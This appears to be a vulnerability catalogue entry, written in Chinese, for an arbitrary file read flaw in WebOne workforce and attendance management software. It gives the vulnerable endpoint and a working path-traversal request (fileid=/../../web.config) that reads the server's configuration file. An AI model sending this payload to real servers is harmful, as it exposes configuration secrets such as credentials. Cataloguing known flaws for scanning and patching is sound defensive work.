vendor = "WebOne"
name = "WebOne劳动力与考勤管理软件的/webForms/Download/DownloadFile.aspx接口存在任意文件读取"
type = "任意文件读取"
version = "未知"
path = "/webForms/Download/DownloadFile.aspx"
detail = "/webForms/Download/DownloadFile.aspx?fileid=/../../web.config&flag=report"
fix = "未知"
date = "0709"
label = "1day"
verifier = "AdySec"
